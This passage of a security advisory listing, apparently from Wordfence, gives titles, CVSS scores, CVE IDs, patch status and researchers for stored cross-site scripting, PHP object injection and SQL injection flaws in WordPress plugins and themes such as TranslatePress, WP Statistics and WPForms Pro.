<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fec48853-afa5-4310-be2e-e86c01ece227" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation &lt;= 3.2.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75981" target="_blank" rel="noopener noreferrer">							CVE-2026-75981						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ce1fa8b42931a00204df4e057e0ab1a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce1fa8b42931a00204df4e057e0ab1a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-pham" target="_blank" rel="noopener">Pham Duc Anh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fec48853-afa5-4310-be2e-e86c01ece227" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e90871-b178-48bc-8355-8b2415d2f2ab" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation &lt;= 3.3.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66582" target="_blank" rel="noopener noreferrer">							CVE-2026-66582						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quentin-lamour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/70feb6ba16956cc1bd202e0371acc176.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="70feb6ba16956cc1bd202e0371acc176"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quentin-lamour" target="_blank" rel="noopener">Quentin Lamour</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1e90871-b178-48bc-8355-8b2415d2f2ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86744065-862c-4167-9644-d675662c66e0" target="_blank" rel="noopener">Ultimate Dashboard – Custom WordPress Dashboard &lt;= 3.11.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66621" target="_blank" rel="noopener noreferrer">							CVE-2026-66621						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-dashboard" target="_blank" rel="noopener">Ultimate Dashboard – Custom WordPress Dashboard</a> <span class="wfvr-software-slug">[ultimate-dashboard]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86744065-862c-4167-9644-d675662c66e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef9ec21b-8216-4e7e-a4e5-25871f4ee0ff" target="_blank" rel="noopener">Ultimate Maps by Supsystic &lt; 1.5.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73375" target="_blank" rel="noopener noreferrer">							CVE-2026-73375						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-maps-by-supsystic" target="_blank" rel="noopener">Ultimate Maps by Supsystic</a> <span class="wfvr-software-slug">[ultimate-maps-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef9ec21b-8216-4e7e-a4e5-25871f4ee0ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ef5f88e-0bdd-475f-a0d3-2e71bd13fccf" target="_blank" rel="noopener">URL Shortify – Simple and Easy URL Shortener &lt;= 2.5.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73362" target="_blank" rel="noopener noreferrer">							CVE-2026-73362						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify" target="_blank" rel="noopener">URL Shortify – Simple and Easy URL Shortener</a> <span class="wfvr-software-slug">[url-shortify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9ef5f88e-0bdd-475f-a0d3-2e71bd13fccf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e895fc43-2348-4a02-abbf-eadaa181d25d" target="_blank" rel="noopener">Urna &#8211; All-in-one WooCommerce WordPress Theme &lt;= 2.6.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66610" target="_blank" rel="noopener noreferrer">							CVE-2026-66610						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/urna" target="_blank" rel="noopener">Urna &#8211; All-in-one WooCommerce WordPress Theme</a> <span class="wfvr-software-slug">[urna]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khuong-hai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba53183437d880ac964d3a974b060a47.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba53183437d880ac964d3a974b060a47"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khuong-hai" target="_blank" rel="noopener">Khuong Hai</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-nam" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b580dc96c70c05c6a8dc20e4999b92c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b580dc96c70c05c6a8dc20e4999b92c7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-nam" target="_blank" rel="noopener">Thanh Nam</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e895fc43-2348-4a02-abbf-eadaa181d25d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f843bd03-cb14-415f-941e-7833a9a2fb90" target="_blank" rel="noopener">WP Multilang – Translation and Multilingual Plugin &lt;= 2.4.31 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73342" target="_blank" rel="noopener noreferrer">							CVE-2026-73342						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-multilang" target="_blank" rel="noopener">WP Multilang – Translation and Multilingual Plugin</a> <span class="wfvr-software-slug">[wp-multilang]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f843bd03-cb14-415f-941e-7833a9a2fb90" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5baecfe-ce0b-4cec-8462-bfd7eadd41e9" target="_blank" rel="noopener">WP Statistics &lt;= 14.16.8 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;utm_campaign&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15780" target="_blank" rel="noopener noreferrer">							CVE-2026-15780						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-statistics" target="_blank" rel="noopener">WP Statistics – Simple, privacy-friendly Google Analytics alternative</a> <span class="wfvr-software-slug">[wp-statistics]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tipsen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a5ed655a05266bd5bfe3cb5fb1db1932.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a5ed655a05266bd5bfe3cb5fb1db1932"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tipsen" target="_blank" rel="noopener">tipsen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5baecfe-ce0b-4cec-8462-bfd7eadd41e9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4404401-466e-4bc9-aa9c-8262aedcb457" target="_blank" rel="noopener">WPComplete &lt;= 2.9.5.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66599" target="_blank" rel="noopener noreferrer">							CVE-2026-66599						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomplete" target="_blank" rel="noopener">WPComplete</a> <span class="wfvr-software-slug">[wpcomplete]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4404401-466e-4bc9-aa9c-8262aedcb457" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a42efc2-b8ec-4a69-94b2-afbe3d584e55" target="_blank" rel="noopener">wpDataTables (Premium) &lt;= 6.5.1.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66597" target="_blank" rel="noopener noreferrer">							CVE-2026-66597						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</a> <span class="wfvr-software-slug">[wpdatatables]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a42efc2-b8ec-4a69-94b2-afbe3d584e55" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f26cbc41-8ed9-4dc6-a8bc-9986ecab5e6e" target="_blank" rel="noopener">WPForms Pro &lt;= 2.0.0.2 &#8211; Unauthenticated Stored Cross-Site Scripting via Single Line Text and Paragraph Text Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18409" target="_blank" rel="noopener noreferrer">							CVE-2026-18409						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms" target="_blank" rel="noopener">WPForms Pro</a> <span class="wfvr-software-slug">[wpforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f26cbc41-8ed9-4dc6-a8bc-9986ecab5e6e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87c7ea55-f1ac-411e-9b27-650461f74afb" target="_blank" rel="noopener">OptionTree &lt;= 2.7.3 &#8211; Authenticated (Editor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66620" target="_blank" rel="noopener noreferrer">							CVE-2026-66620						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/option-tree" target="_blank" rel="noopener">OptionTree</a> <span class="wfvr-software-slug">[option-tree]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87c7ea55-f1ac-411e-9b27-650461f74afb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67910b99-6024-4b24-9c55-4b1cb0ddfa45" target="_blank" rel="noopener">Tag, Category, and Taxonomy Manager – Autotagger Automatically Add Terms &lt;= 3.51.0 &#8211; Authenticated (Editor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74012" target="_blank" rel="noopener noreferrer">							CVE-2026-74012						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags" target="_blank" rel="noopener">Tag, Category, and Taxonomy Manager – Autotagger Automatically Add Terms</a> <span class="wfvr-software-slug">[simple-tags]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67910b99-6024-4b24-9c55-4b1cb0ddfa45" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/942be1b2-0227-49e3-9e99-63b3de48fb22" target="_blank" rel="noopener">Community by PeepSo – Download from PeepSo.com &lt;= 9.0.5.2 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66668" target="_blank" rel="noopener noreferrer">							CVE-2026-66668						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/peepso-core" target="_blank" rel="noopener">Community by PeepSo – Download from PeepSo.com</a> <span class="wfvr-software-slug">[peepso-core]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
